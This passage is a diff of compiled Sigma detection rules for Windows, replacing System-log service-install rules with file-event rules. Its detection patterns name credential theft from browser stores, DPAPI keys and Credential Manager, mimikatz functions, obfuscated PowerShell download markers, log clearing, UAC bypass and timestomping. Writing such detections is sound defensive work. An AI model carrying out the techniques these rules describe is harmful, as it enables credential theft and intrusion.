LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchIndexer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SearchProtocolHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthService.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\services.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ShellAppRuntime.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sihost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\smss.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\svchost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SystemSettingsBroker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TiWorker.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WerFaultSecure.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wermgr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wininit.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinRTNetMUAHostServer.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wslhost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSReset.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WUDFHost.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WWAHost.exe' ESCAPE '\\') AND NOT (((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR TargetFilename LIKE '\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\Windows\\\\System32\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\SetupHost.exe' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\system32\\\\wbengine.exe' ESCAPE '\\') OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\bcdedit.exe' ESCAPE '\\')) OR (Image LIKE '%:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:Program Files\\\\WindowsApps\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\SecurityHealth\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\SecurityHealthSystray.exe' ESCAPE '\\' AND Image LIKE '%\\\\SecurityHealthSetup.exe' ESCAPE '\\')))" ], - "filename": "win_system_cobaltstrike_service_installs.yml" + "filename": "file_event_win_creation_system_file.yml" }, { - "title": "RTCore Suspicious Service Installation", - "id": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", - "status": "experimental", - "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Using .NET Code Profiler on MMC", + "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "status": "test", + "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'RTCore64')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" ], - "filename": "win_system_susp_rtcore64_service_install.yml" + "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - System", - "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "title": "Potential Privilege Escalation Attempt Via .Exe.Local Technique", + "id": "07a99744-56ac-40d2-97b7-2095967b0e03", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects potential privilege escalation attempt via the creation of the \"*.Exe.Local\" folder inside the \"System32\" directory in order to sideload \"comctl32.dll\"", + "author": "Nasreddine Bencherchali (Nextron Systems), Subhash P (@pbssubhash)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wermgr.exe.local%' ESCAPE '\\') AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_system_invoke_obfuscation_clip_services.yml" + "filename": "file_event_win_system32_local_folder_privilege_escalation.yml" }, { - "title": "Suspicious Service Installation", - "id": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "title": "Potential Persistence Via Notepad++ Plugins", + "id": "54127bd4-f541-4ac3-afdb-ea073f63f692", "status": "experimental", - "description": "Detects suspicious service installation commands", - "author": "pH-T (Nextron Systems)", + "description": "Detects creation of new \".dll\" files inside the plugins directory of a notepad++ installation by a process other than \"gup.exe\". Which could indicates possible persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Possible FPs during first installation of Notepad++", + "Legitimate use of custom plugins by users in order to enhance notepad++ functionalities" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '% -w hidden %' ESCAPE '\\' OR ImagePath LIKE '% -nop %' ESCAPE '\\' OR ImagePath LIKE '% -sta %' ESCAPE '\\' OR ImagePath LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\.\\\\pipe%' ESCAPE '\\' OR ImagePath LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR ImagePath LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR ImagePath LIKE '%.downloadstring(%' ESCAPE '\\' OR ImagePath LIKE '%.downloadfile(%' ESCAPE '\\') OR (ImagePath LIKE '% -e%' ESCAPE '\\' AND (ImagePath LIKE '% JAB%' ESCAPE '\\' OR ImagePath LIKE '% SUVYI%' ESCAPE '\\' OR ImagePath LIKE '% SQBFAFgA%' ESCAPE '\\' OR ImagePath LIKE '% aWV4I%' ESCAPE '\\' OR ImagePath LIKE '% IAB%' ESCAPE '\\' OR ImagePath LIKE '% PAA%' ESCAPE '\\' OR ImagePath LIKE '% aQBlAHgA%' ESCAPE '\\')))) AND NOT ((ImagePath LIKE 'C:\\\\WINDOWS\\\\TEMP\\\\thor10-remote\\\\thor64.exe%' ESCAPE '\\') OR (ImagePath LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Notepad++\\\\plugins\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\Notepad++\\\\updater\\\\gup.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\target.exe' ESCAPE '\\' OR Image LIKE '%Installer.x64.exe' ESCAPE '\\'))))" ], - "filename": "win_system_susp_service_installation.yml" + "filename": "file_event_win_notepad_plus_plus_persistence.yml" }, { - "title": "Tap Driver Installation", - "id": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", - "status": "test", - "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "title": "Potential Startup Shortcut Persistence Via PowerShell.EXE", + "id": "92fa78e7-4d39-45f1-91a3-8b23f3f1088d", + "status": "experimental", + "description": "Detects PowerShell writing startup shortcuts.\nThis procedure was highlighted in Red Canary Intel Insights Oct. 2021, \"We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence.\nAccordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats.\nIn the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL\"\n", + "author": "Christopher Peacock '@securepeacock', SCYTHE", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate OpenVPN TAP insntallation" + "Depending on your environment accepted applications may leverage this at times. It is recommended to search for anomalies inidicative of malware." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%tap0901%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND TargetFilename LIKE '%\\\\start menu\\\\programs\\\\startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk' ESCAPE '\\')" ], - "filename": "win_system_tap_driver_installation.yml" + "filename": "file_event_win_powershell_startup_shortcuts.yml" }, { - "title": "Important Windows Eventlog Cleared", - "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "title": "Rename Common File to DLL File", + "id": "bbfd974c-248e-4435-8de6-1e938c79c5c1", "status": "experimental", - "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems), Tim Shelton", - "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" - ], + "description": "Detects cases in which a file gets renamed to .dll, which often happens to bypass perimeter protection", + "author": "frack113", "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Application installation" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.dll' ESCAPE '\\' AND NOT (((SourceFilename LIKE '%.dll' ESCAPE '\\' OR SourceFilename LIKE '%.tmp' ESCAPE '\\') OR (SourceFilename LIKE '%.dll.%' ESCAPE '\\' OR SourceFilename LIKE '%\\\\SquirrelTemp\\\\temp%' ESCAPE '\\')) OR (SourceFilename = '') OR (SourceFilename = '') OR (Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\wuauclt.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" ], - "filename": "win_system_susp_eventlog_cleared.yml" + "filename": "file_rename_win_not_dll_to_dll.yml" }, { - "title": "Mesh Agent Service Installation", - "id": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", + "title": "Suspicious Appended Extension", + "id": "e3f673b3-65d1-4d80-9146-466f8b63fa99", "status": "experimental", - "description": "Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects possible ransomware adding a custom extension to the encrypted files, such as \".jpg.crypted\", \".docx.locky\" etc.", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.impact", + "attack.t1486" ], "falsepositives": [ - "Legitimate use of the tool" + "Backup software" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%MeshAgent.exe%' ESCAPE '\\' OR ServiceName LIKE '%Mesh Agent%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((SourceFilename LIKE '%.lnk' ESCAPE '\\' OR SourceFilename LIKE '%.rtf' ESCAPE '\\' OR SourceFilename LIKE '%.pst' ESCAPE '\\' OR SourceFilename LIKE '%.docx' ESCAPE '\\' OR SourceFilename LIKE '%.xlsx' ESCAPE '\\' OR SourceFilename LIKE '%.jpg' ESCAPE '\\' OR SourceFilename LIKE '%.jpeg' ESCAPE '\\' OR SourceFilename LIKE '%.png' ESCAPE '\\' OR SourceFilename LIKE '%.pdf' ESCAPE '\\') AND (TargetFilename LIKE '%.lnk.%' ESCAPE '\\' OR TargetFilename LIKE '%.rtf.%' ESCAPE '\\' OR TargetFilename LIKE '%.pst.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpeg.%' ESCAPE '\\' OR TargetFilename LIKE '%.png.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) AND NOT (((TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.bak' ESCAPE '\\' OR TargetFilename LIKE '%.old' ESCAPE '\\' OR TargetFilename LIKE '%.orig' ESCAPE '\\' OR TargetFilename LIKE '%.backup' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (TargetFilename LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.c~' ESCAPE '\\')))" ], - "filename": "win_system_service_install_mesh_agent.yml" + "filename": "file_rename_win_ransomware.yml" }, { - "title": "Exploit SamAccountName Spoofing with Kerberos", - "id": "44bbff3e-4ca3-452d-a49a-6efa4cafa06f", - "status": "test", - "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", - "author": "frack113", + "title": "Unusual File Modification by dns.exe", + "id": "9f383dc0-fdeb-4d56-acbc-9f9f4f8f20f3", + "status": "experimental", + "description": "Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Microsoft-Windows-Kerberos-Key-Distribution-Center' AND EventID IN ('35', '36', '37', '38')) OR (Provider_Name = 'Microsoft-Windows-Directory-Services-SAM' AND EventID IN ('16990', '16991'))))" + "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_system_vul_cve_2021_42278_or_cve_2021_42287.yml" + "filename": "file_change_win_unusual_modification_by_dns_exe.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - System", - "id": "51aa9387-1c53-4153-91cc-d73c59ae1ca9", + "title": "File Creation Date Changed to Another Year", + "id": "558eebe5-f2ba-4104-b339-36f7902bcc1a", "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "description": "Attackers may change the file creation time of a backdoor to make it look like it was installed with the operating system.\nNote that many processes legitimately change the creation time of a file; it does not necessarily indicate malicious activity.\n", + "author": "frack113, Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.t1070.006", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Changes made to or by the local NTP service" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7045' AND (ImagePath REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ImagePath REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ImagePath REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ImagePath REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ImagePath REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ImagePath REGEXP '\\$VerbosePreference\\.ToString\\(' OR ImagePath REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((EventID = '2' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PreviousCreationUtcTime LIKE '2022%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '2022%' ESCAPE '\\')) OR (PreviousCreationUtcTime LIKE '202%' ESCAPE '\\' AND NOT (CreationUtcTime LIKE '202%' ESCAPE '\\'))) AND NOT (((Image LIKE 'C:\\\\Windows\\\\system32\\\\ProvTool.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\usocoreworker.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\ProgramData\\\\USOPrivate\\\\UpdateStore\\\\%' ESCAPE '\\' OR (TargetFilename LIKE '%.tmp' ESCAPE '\\' OR TargetFilename LIKE '%.temp' ESCAPE '\\')) OR (Image LIKE 'C:\\\\WINDOWS\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\' AND TargetFilename LIKE '%.cab' ESCAPE '\\')))" ], - "filename": "win_system_invoke_obfuscation_obfuscated_iex_services.yml" + "filename": "file_change_win_2022_timestomping.yml" }, { - "title": "QuarksPwDump Clearing Access History", - "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", - "status": "test", - "description": "Detects QuarksPwDump clearing access history in hive", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Access To Browser Credential Files", + "id": "91cb43db-302a-47e3-b3c8-7ede481e27bf", + "status": "experimental", + "description": "Detects suspicious processes based on name and location that access the browser credential stores which can be the sign of credential stealing", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.t1003", + "attack.credential_access" ], "falsepositives": [ - "Unknown" + "Antivirus, Anti-Spyware, Anti-Malware Software", + "Backup software", + "Legitimate software installed on partitions other than \"C:\\\"", + "Searching software such as \"everything.exe\"" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((FileName LIKE '%\\\\Appdata\\\\Local\\\\Microsoft\\\\Windows\\\\WebCache\\\\WebCacheV01.dat' ESCAPE '\\' OR (FileName LIKE '%\\\\cookies.sqlite' ESCAPE '\\' OR FileName LIKE '%release\\\\key3.db' ESCAPE '\\' OR FileName LIKE '%release\\\\key4.db' ESCAPE '\\' OR FileName LIKE '%release\\\\logins.json' ESCAPE '\\') OR (FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Network\\\\Cookies%' ESCAPE '\\' OR FileName LIKE '%\\\\Appdata\\\\Local\\\\Chrome\\\\User Data\\\\Default\\\\Login Data%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Local State%' ESCAPE '\\')) AND NOT ((Image = 'System' AND ParentImage = 'Idle') OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\%' ESCAPE '\\')))) AND NOT ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\MpCopyAccelerator.exe' ESCAPE '\\' OR Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\')))" ], - "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" + "filename": "file_access_win_browser_credential_stealing.yml" }, { - "title": "Service Installation with Suspicious Folder Pattern", - "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", - "status": "test", - "description": "Detects service installation with suspicious folder patterns", - "author": "pH-T (Nextron Systems)", + "title": "Suspicious Access To Windows DPAPI Master Keys", + "id": "46612ae6-86be-4802-bc07-39b59feb1309", + "status": "experimental", + "description": "Detects suspicious processes based on name and location that access the Windows Data Protection API Master keys.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "car.2013-09-005", - "attack.t1543.003" + "attack.credential_access", + "attack.t1555.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" + "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-18\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\Microsoft\\\\Protect\\\\S-1-5-21-%' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" ], - "filename": "win_system_susp_service_installation_folder_pattern.yml" + "filename": "file_access_win_dpapi_master_key_access.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - System", - "id": "641a4bfb-c017-44f7-800c-2aee0184ce9b", + "title": "Credential Manager Access", + "id": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1003", + "attack.credential_access" ], "falsepositives": [ - "Unknown" + "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%shell32.dll%' ESCAPE '\\' AND ImagePath LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ImagePath LIKE '%value%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%comspec%' ESCAPE '\\' OR ImagePath LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Credentials\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\' OR FileName LIKE '%\\\\ProgramData\\\\Microsoft\\\\Vault\\\\%' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\system32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" ], - "filename": "win_system_invoke_obfuscation_via_use_rundll32_services.yml" + "filename": "file_access_win_credential_manager_stealing.yml" }, { - "title": "DHCP Server Error Failed Loading the CallOut DLL", - "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", - "status": "test", - "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", - "author": "Dimitrios Slamaris, @atc_project (fix)", + "title": "Suspicious Access To Windows Credential History File", + "id": "7a2a22ea-a203-4cd3-9abf-20eb1c5c6cd2", + "status": "experimental", + "description": "Detects suspicious processes based on name and location that access the Windows Credential History File.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.credential_access", + "attack.t1555.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 